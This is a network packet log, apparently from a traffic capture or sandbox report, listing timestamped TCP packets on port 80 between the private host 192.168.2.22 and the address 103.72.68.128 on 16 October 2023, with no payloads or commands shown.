Oct 16, 2023 09:58:25.927386045 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.927434921 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.927499056 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.927536964 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.927606106 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.927634954 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.927644014 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.927675009 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.927705050 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.927742958 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.927742958 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:25.927786112 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.927815914 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:25.928083897 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.282041073 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.282073975 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.282088995 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.282104969 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.282144070 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.282222033 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.282227993 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.282264948 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.282264948 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.282268047 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.282285929 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.282310963 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.282327890 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.282396078 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.282447100 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.283396959 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.283422947 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.283457041 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.283474922 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.283510923 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.283541918 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.283551931 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.283580065 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.283637047 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.283663034 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.283679962 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.283684969 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.283726931 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.283760071 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.283797026 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.283799887 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.283838987 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.283874035 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.283909082 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.283963919 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.284003019 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.284101009 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.284101963 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.284142017 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.284162045 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.284199953 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.284234047 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.284271955 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.284373045 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.284413099 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.284434080 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.284461975 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.284472942 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.284549952 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.284590960 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.284626961 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.284666061 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.284710884 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.284754992 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.284787893 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.284830093 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.284950972 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.284990072 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.285010099 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.285128117 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.285175085 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.285191059 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.285213947 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.285224915 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.285249949 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.285285950 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.285320997 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.285356998 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.285413980 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.285453081 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.285487890 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.285533905 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.285567999 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.285614967 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.285635948 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.285679102 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.285695076 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.285737991 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.285753965 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.285793066 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.285813093 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.285850048 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.285857916 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.285888910 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.285919905 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.285967112 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.285974979 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.286006927 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.286031008 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.286041021 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.286086082 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.286123991 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.286133051 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.286170959 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.286180973 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.286200047 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.286221981 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.286233902 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.286292076 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.286331892 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.286356926 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.639933109 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.639959097 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.639971972 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.640012026 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.640012980 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.640028000 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.640048027 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.640048027 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.640064955 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.640091896 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.640135050 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.640166044 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.640202999 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.640233994 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.640269995 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.641092062 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.641134977 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.641155958 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.641191959 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.641222000 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.641258001 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.641319036 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.641323090 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.641352892 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.641423941 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.641463041 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.641491890 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.641527891 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.641576052 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.641613007 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.641661882 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.641701937 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.641757965 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.641797066 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.641845942 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.641880035 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.641911983 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.641946077 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.641976118 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.642008066 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.642062902 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.642096996 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.642318964 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.642360926 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.642457008 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.642524958 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.642584085 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.642616987 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.642616987 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.642616987 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.642626047 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.642659903 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.642699957 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.642744064 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.642756939 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.642808914 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.642822981 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.642862082 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.642916918 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.642956018 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.642986059 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.643021107 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.643085003 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.643121958 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.643141031 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.643174887 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.643204927 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.643234968 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.643244028 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.643270016 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.643284082 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.643318892 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.643335104 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.643369913 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.643424034 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.643460035 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.643460989 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.643495083 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.643562078 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.643595934 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.643625975 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.643660069 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.643723965 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.643759966 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.643970013 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.644010067 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.644027948 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.644066095 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.644083023 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.644119024 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.644161940 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.644203901 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.644222975 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.644258022 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.644295931 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.644330978 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.644396067 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.644431114 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.644448042 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.644483089 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.997730017 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.997752905 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.997842073 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.997858047 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.997900009 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.997963905 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.998017073 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.998045921 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.998078108 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.998086929 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.998115063 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.998126984 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.998156071 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.998338938 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.998385906 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.998414993 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.998475075 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.998497009 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.998541117 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.998574018 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.998610973 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.998646975 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.998688936 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.998718977 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.998755932 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.998778105 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.998799086 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.998821020 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.998837948 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.998856068 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.998895884 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.998919964 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.998963118 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.999056101 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.999094963 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.999195099 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.999233007 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.999243021 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.999280930 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.999322891 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.999360085 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.999365091 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.999402046 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.999820948 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.999864101 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.999871969 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:26.999919891 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:26.999991894 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.000011921 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.000037909 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.000056028 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.000087976 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.000127077 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.000158072 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.000195980 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.000209093 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.000226021 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.000247002 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.000263929 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.000296116 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.000334024 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.000365973 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.000408888 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.000423908 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.000462055 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.000485897 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.000524044 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.000539064 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.000562906 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.000581026 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.000602961 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.000711918 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.000756025 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.000761986 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.000803947 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.000866890 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.000910997 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.000940084 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.000956059 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.000982046 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.001028061 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.001039982 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.001080990 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.001117945 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.001162052 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.001198053 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.001245975 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.001276970 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.001307964 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.001317024 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.001342058 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.001362085 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.001400948 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.001507044 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.001563072 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.001591921 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.001630068 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.001638889 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.001677990 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.001713991 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.001759052 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.001785994 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.001831055 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.001867056 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.001928091 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.001930952 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.001971006 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.001997948 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.002043009 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.002079964 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.002111912 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.002130032 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.002130985 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.002151966 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.002171993 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.002233982 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.002275944 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.002306938 CEST	80	49164	103.72.68.128	192.168.2.22
